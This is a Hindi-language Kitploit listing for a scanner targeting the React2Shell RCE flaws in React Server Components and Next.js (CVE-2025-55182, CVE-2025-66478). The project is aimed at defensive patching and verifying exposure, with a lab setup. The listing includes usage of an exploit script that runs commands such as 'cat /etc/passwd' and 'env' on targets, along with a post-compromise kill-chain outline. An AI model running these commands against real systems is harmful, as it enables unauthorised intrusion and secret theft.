Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react2shell-scanner-rce-react-next-CVE-2025-55182-CVE-2025-66478 — CVE-2025-55182 (React) और CVE-2025-66478 (Next.js) के लिए स्कैनर - react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack, और RSC-सक्षम फ्रेमवर्क जैसे Next.js को प्रभावित करने वाले एक गंभीर React Server Components (RSC) / Flight प्रोटोकॉल भेद्यता अभियान को ट्रैक करें और उसका समाधान करें। | Kitploit
उपकरण/GitHubGitHub/security-phoenix-demo/react2shell-scanner-rce-react-next-cve-2025-55182-cve-2025-66478
भेद्यता स्कैनरवेब भेद्यता स्कैनरकोड विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षालैब और अभ्यास
GitHubsecurity-phoenix-demo/react2shell-scanner-rce-react-next-cve-2025-55182-cve-2025-66478

react2shell-scanner-rce-react-next-CVE-2025-55182-CVE-2025-66478

रिपॉजिटरी देखें
63117 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

CVE-2025-55182 (React) और CVE-2025-66478 (Next.js) के लिए स्कैनर - react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack, और RSC-सक्षम फ्रेमवर्क जैसे Next.js को प्रभावित करने वाले एक गंभीर React Server Components (RSC) / Flight प्रोटोकॉल भेद्यता अभियान को ट्रैक करें और उसका समाधान करें।

साझा करें

🔍 Phoenix SCA Scanner - Universal - CVE-2025-55182-CVE-2025-66478 React और Nexus भेद्यता के लिए संस्करण

React2Shell बग वर्ग के लिए EXTERNAL भेद्यता: React Server Components (RSC) "Flight" प्रोटोकॉल में दो ताजा खोजी गई, अप्रमाणित रिमोट कोड निष्पादन भेद्यताएँ—CVE-2025-55182 (React) और CVE-2025-66478 (Next.js), दोनों को CVSS 10.0 रेट किया गया है। ये समस्याएँ इस बात में निहित हैं कि कैसे RSC/सर्वर फ़ंक्शन एंडपॉइंट attacker-नियंत्रित Flight पेलोड को डिकोड करते हैं, एक एकल क्राफ्टेड HTTP अनुरोध को संभावित सर्वर-साइड कोड निष्पादन में बदल देते हैं—यहाँ तक कि App Router और प्रोडक्शन बिल्ड का उपयोग करने वाले "डिफ़ॉल्ट" आधुनिक React/Next.js स्टैक पर भी। कई टीमों के लिए यह "अब पैच करें, एक्सपोज़र सत्यापित करें, फिर ऑडिट करें" का क्षण है, न कि बाद की डिपेंडेंसी स्वच्छता स्प्रिंट पर टालने वाली कोई चीज़।

LAB फ़ोल्डर में React2Shell के लिए एक्सप्लॉइट और लैब भेद्यताएँ शामिल हैं।

यह परियोजना एक दो-आयामी दृष्टिकोण प्रदान करती है: (1) सॉफ़्टवेयर संरचना / डिपेंडेंसी जोखिम स्कैनिंग (यह टूल), ताकि कमजोर लाइब्रेरी और संस्करणों को तेज़ी से ढूंढा जा सके, और (2) एक वेब DAST स्कैनर (React2Shell वेब स्कैनर) जो बाहर से RSC/Flight एंडपॉइंट को सक्रिय रूप से प्रोब करता है, यह सत्यापित करते हुए कि चालू वातावरण में शोषण योग्य पथ पहुँच योग्य हैं या नहीं। साथ में, ये आपको "कमजोर घटक कहाँ हैं?" और "उत्पादन में वास्तव में कहाँ शोषण किया जा सकता है?" दोनों का उत्तर देने में मदद करते हैं, ताकि आप आत्मविश्वास के साथ पैचिंग, हार्डनिंग और घटना प्रतिक्रिया को प्राथमिकता दे सकें।


🌐 वेब स्कैनर - React2Shell RCE डिटेक्शन

लाइव एंडपॉइंट परीक्षण और RCE सत्यापन के लिए, समर्पित वेब स्कैनर देखें:

📁 web-scan_CVE-2025-66478/ - पूर्ण दस्तावेज़ीकरण और गाइड

त्वरित प्रारंभ - वेब स्कैनर

cd web-scan_CVE-2025-66478

# निर्भरताएँ स्थापित करें
pip install -r requirements.txt

# एकल लक्ष्य स्कैन करें
python3 react2shell-scanner -u https://target.com -v

# साक्ष्य प्रदर्शन के साथ स्कैन करें
python3 react2shell-scanner -u https://target.com --show-evidence

# सभी निर्यात स्वरूपों के साथ बैच स्कैन
python3 react2shell-scanner -l targets.txt -o results.json --csv results.csv --html report.html

# कमजोर लक्ष्य पर एक्सप्लॉइट का परीक्षण करें (Python 3.11+ आवश्यक)
python3.11 test-lab/exploit.py -u http://vulnerable-host:3000 -c "hostname"

वेब स्कैनर सुविधाएँ

सुविधाविवरण
🔍 RCE डिटेक्शनअंकगणित-आधारित सुरक्षित डिटेक्शन (कोई साइड इफ़ेक्ट नहीं)
🎯 टेक्नोलॉजी फ़िंगरप्रिंटिंगस्वतः Next.js/React अनुप्रयोगों का पता लगाएँ
📊 मल्टी-फ़ॉर्मेट एक्सपोर्टJSON, CSV, HTML रिपोर्ट
🔗 IOC सहसंबंध31+ ज्ञात दुर्भावनापूर्ण IP से मिलान करें
🌐 स्केल स्कैनिंगCIDR रेंज, सबडोमेन गणना
☁️ Phoenix एकीकरणPhoenix Security पर परिणाम अपलोड करें
💻 एक्सप्लॉइट टूलकमजोर लक्ष्यों पर कमांड निष्पादित करें

परीक्षण प्रयोगशाला सेटअप

cd web-scan_CVE-2025-66478/test-lab/lab

# कमजोर (3011) और पैच किए गए (3012) इंस्टेंस प्रारंभ करें
docker-compose up -d

# कमजोर इंस्टेंस का परीक्षण करें
python3 react2shell-scanner -u http://localhost:3011 --show-evidence

एक्सप्लॉइट उदाहरण (Python 3.11+ आवश्यक)

cd web-scan_CVE-2025-66478/test-lab

# एक्सप्लॉइट निर्भरताएँ स्थापित करें
pip3.11 install -r requirements.txt

# बुनियादी कमांड निष्पादन
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# आउटपुट: nextjs

python3.11 exploit.py -u http://localhost:3011 -c "id"
# आउटपुट: uid=1001(nextjs) gid=65533(nogroup)

python3.11 exploit.py -u http://localhost:3011 -c "hostname"  
# आउटपुट: 99e28775bf80 (कंटेनर ID)

# सिस्टम गणना
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env"

# एप्लिकेशन रीकॉन
python3.11 exploit.py -u http://localhost:3011 -c "pwd"           # /app
python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"

🛡 React2Shell / Flight प्रोटोकॉल RCE – भेद्यता अवलोकन

React2Shell React Server Components (RSC) पेलोड हैंडलिंग में Flight प्रोटोकॉल के विरुद्ध एक अप्रमाणित रिमोट कोड निष्पादन प्राइमिटिव है। व्यवहार में, इसका मतलब है कि एक दुर्भावनापूर्ण क्लाइंट RSC/सर्वर फ़ंक्शन एंडपॉइंट पर एक एकल क्राफ्टेड HTTP अनुरोध भेज सकता है और, यदि कोई कमजोर संस्करण चल रहा है, तो संभावित रूप से "वेब ऐप" को "सर्वर शेल" में बदल सकता है।

उच्च स्तर पर:

  • Attacker-नियंत्रित Flight पेलोड RSC/सर्वर फ़ंक्शन हैंडलिंग में शामिल एंडपॉइंट पर भेजे जाते हैं (जैसे, Next.js App Router परिनियोजन में)।
  • सर्वर उस पेलोड को वापस सर्वर-साइड डेटा और निर्देशों में बदलने के लिए React के Flight डिकोडिंग और डिसीरियलाइज़ेशन तर्क का उपयोग करता है।
  • इस परत पर असुरक्षित डिसीरियलाइज़ेशन एक हमलावर को सर्वर-साइड निष्पादन को प्रभावित करने की अनुमति देता है, जो पूर्ण रिमोट कोड निष्पादन (RCE) तक बढ़ जाता है।

चूँकि यह अप्रमाणित RCE है, डिफ़ॉल्ट प्रोडक्शन सेटअप दायरे में हैं—भले ही आपने कभी स्पष्ट रूप से "सर्वर फ़ंक्शन" नहीं लिखा हो और केवल आधुनिक React/Next.js पैटर्न अपनाए हों। होस्टिंग-स्तरीय शमन और सामान्य WAF को आपकी प्राथमिक सुरक्षा जाल के रूप में नहीं माना जाना चाहिए: वे एक्सपोज़र को कम कर सकते हैं लेकिन कमजोर लाइब्रेरी के लिए विश्वसनीय रूप से क्षतिपूर्ति नहीं करेंगे। इसे एक घटना के रूप में मानें:

  • React RSC सर्वर DOM पैकेज और Next.js को निश्चित रिलीज़ पर पैच करें।
  • कोडबेस और SBOM को कमजोर संस्करणों के लिए स्कैन करके एक्सपोज़र सत्यापित करें।
  • RSC/Flight-संबंधित एंडपॉइंट पर संदिग्ध अनुरोधों के लिए लॉग ऑडिट करें और यदि समझौते का संदेह हो तो रहस्य घुमाएँ।

एक बार जब कोई हमलावर React2Shell के माध्यम से RCE प्राप्त कर लेता है, तो रक्षकों को एक परिचित किल चेन मान लेनी चाहिए:

  • पर्यावरण खोज – रनटाइम, फ़ाइल सिस्टम लेआउट, पर्यावरण चर और क्लाउड मेटाडेटा एंडपॉइंट की गणना करें।
  • रहस्य शिकार – .env फ़ाइलें, परिनियोजन रहस्य, CI टोकन, सेवा क्रेडेंशियल और साइनिंग कुंजियाँ एकत्र करें।
  • स्थायित्व – वेबशेल जैसी कलाकृतियाँ छोड़ें, सर्वर-साइड कोड संशोधित करें, या जहाँ संभव हो निर्धारित कार्य प्रत्यारोपित करें।
  • पार्श्विक गति – आंतरिक सेवाओं, डेटाबेस, कतारों और क्लाउड प्रबंधन API में प्रवेश करें।
  • आपूर्ति श्रृंखला अनुवर्ती – यदि बिल्ड या परिनियोजन क्रेडेंशियल मौजूद हैं, तो CI/CD और कलाकृति रजिस्ट्री में "अपस्ट्रीम" जाएँ।

यदि आपके DevSecOps पाइपलाइन ने ऐतिहासिक रूप से वेब टियर को "केवल एक फ्रंटएंड" के रूप में माना है, तो यह भेद्यता एक ठोस प्रदर्शन है कि जब RSC और स्ट्रीमिंग सिमैंटिक्स शामिल होते हैं तो फ्रंटएंड फ्रेमवर्क गहरी सर्वर-साइड ब्लास्ट त्रिज्या ले सकते हैं। यूनिवर्सल भेद्यता स्कैनर आपको तेज़ी से उत्तर देने में मदद करने के लिए मौजूद है "क्या हम कहीं भी कमजोर पैकेज चला रहे हैं?" और उस उत्तर को Phoenix-संचालित अभियानों और जल्द ही, लाइव RSC एंडपॉइंट के पूरक वेब DAST सत्यापन में फ़ीड करने के लिए।

🎯 सुविधाएँ

SCA स्कैनर (यह टूल)

  • ✅ मल्टी-इकोसिस्टम सपोर्ट - NPM (PyPI, Ruby Gems, आदि के लिए विस्तारणीयता के साथ)
  • ✅ इंटेलिजेंट वर्शन मैचिंग - रेंज-आधारित डिटेक्शन के साथ Semver पार्सिंग
  • ✅ React सर्वर कंपोनेंट (RSC) डिटेक्शन - RSC भेद्यताओं के लिए विशेष डिटेक्शन
  • ✅ लॉकफ़ाइल सपोर्ट - package-lock.json, yarn.lock, pnpm-lock.yaml पार्स करता है
  • ✅ Phoenix एकीकरण - Phoenix Security प्लेटफ़ॉर्म पर निष्कर्ष अपलोड करें
  • ✅ व्यापक परीक्षण - सत्यापन के लिए नमूना कमजोर पैकेज
  • ✅ JSON/टेक्स्ट रिपोर्ट - लचीले आउटपुट फ़ॉर्मेट
  • ✅ CLI इंटरफ़ेस - उपयोग में आसान कमांड-लाइन टूल
टूल डाउनलोड करें